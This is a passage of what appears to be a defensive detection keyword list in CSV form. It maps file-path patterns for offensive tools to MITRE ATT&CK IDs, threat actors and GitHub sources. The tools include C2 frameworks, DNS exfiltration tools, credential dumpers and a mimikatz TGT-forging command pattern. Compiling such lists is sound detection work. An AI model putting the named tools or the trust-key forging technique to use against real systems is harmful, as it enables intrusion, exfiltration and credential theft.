-*/DllExport.bat*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - 
TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*/DLL-Hijack*,offensive_tool_keyword,cobaltstrike,DLL Hijack Search Order Enumeration BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF,1,1,N/A,10,10,125,21,2021-11-03T17:39:32Z,2021-11-02T03:47:31Z -*/DllNotificationInjection.git*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*/DllProxy.git*,offensive_tool_keyword,DllProxy,Proxy your dll exports and add some spicy content at the same 
time,T1574.002 - T1036.005,TA0005 - TA0004,N/A,N/A,Exploitation Tools,https://github.com/Iansus/DllProxy/,1,1,N/A,N/A,1,16,5,2023-06-28T14:19:36Z,2021-05-04T19:38:42Z -*/dlls/c2.c*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*/dns_grabber.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/dns_spoof*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/dns-blacklist.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-cache-snoop.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dnscan.git*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,1,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*/dnscan.py*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,1,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*/dnscat.c*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*/dnscat2.git*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*/dns-check-zone.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-client-subnet-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dnscnc.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/DNSExfiltrator*,offensive_tool_keyword,DNSExfiltrator,DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.,T1041 - T1048,TA0010 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/Arno0x/DNSExfiltrator,1,1,N/A,10,8,792,189,2019-10-06T22:24:55Z,2017-12-20T13:58:09Z -*/dns-fuzz.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-ip6-arpa-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-nsec3-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-nsec-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-nsid.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/DNS-Persist/*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,1,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*/dns-random-srcport.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-random-txid.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-recursion.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-service-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dnsspoof.c*,offensive_tool_keyword,dsniff,password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).,T1110 - T1040 - T1074.001 - T1555.002 - T1555.003,TA0001 - TA0002 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/tecknicaltom/dsniff,1,0,N/A,N/A,2,167,44,2010-06-29T05:53:39Z,2010-06-23T13:11:11Z -*/dns-srv-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dnsteal*,offensive_tool_keyword,dnsteal,This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.,T1048.003 - T1568.002 - T1573.002,TA0010 - TA0002,N/A,N/A,Data Exfiltration,https://github.com/m57/dnsteal,1,1,N/A,N/A,10,1378,236,2022-02-03T11:04:49Z,2015-08-11T17:02:58Z -*/dnstool.py*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*/dns-update.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-zeustracker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dns-zone-transfer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dobin/avred*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,1,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*/docker-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/DocPlz.git*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/DocsPLZ.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/DocsPLZ.exe*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/documentation-c2/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/documentation-payload/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Doge-Loader/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Loader by Golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/timwhitez/Doge-Loader,1,1,N/A,10,10,277,61,2021-04-22T08:24:59Z,2020-10-09T04:47:54Z 
-*/DoHC2.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*/DoHC2.git*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*/DoHC2/*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*/domain:* /sid:* /sids:* /rc4:* /user:* /service:krbtgt /target:*.kirbi*,offensive_tool_keyword,mimikatz,Mimikatz Using domain trust key From the DC dump the hash of the currentdomain\targetdomain$ trust account using Mimikatz (e.g. with LSADump or DCSync). Then using this trust key and the domain SIDs. 
forge an inter-realm TGT using Mimikatz adding the SID for the target domains enterprise admins group to our SID history.,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*/domain_analyzer.git*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,1,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*/domain_analyzer:latest*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,0,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*/domainhunter*,offensive_tool_keyword,domainhunter,Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ,T1583.002 - T1568.002,TA0011 - TA0009,N/A,N/A,Phishing,https://github.com/threatexpress/domainhunter,1,1,N/A,N/A,10,1380,291,2022-10-26T03:15:13Z,2017-03-01T11:16:26Z -*/DomainRecon/*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 
Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/domcon-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/domcon-cmd.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Dome.git*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,1,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*/domino-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dompdf-rce*,offensive_tool_keyword,POC,This repository contains a vulnerable demo application using dompdf 1.2.0 and an exploit that achieves remote code execution via a ttf+php polyglot file.,T1203 - T1204,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/positive-security/dompdf-rce,1,1,N/A,N/A,2,170,69,2022-03-17T18:05:07Z,2022-03-14T19:51:06Z -*/DonPAPI.git*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/DonPAPI.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/donut *.exe*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/donut.exe*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/donut.git,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/Donut_Linux*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*/Donut_Windows*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*/DonutCS/Donut.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - 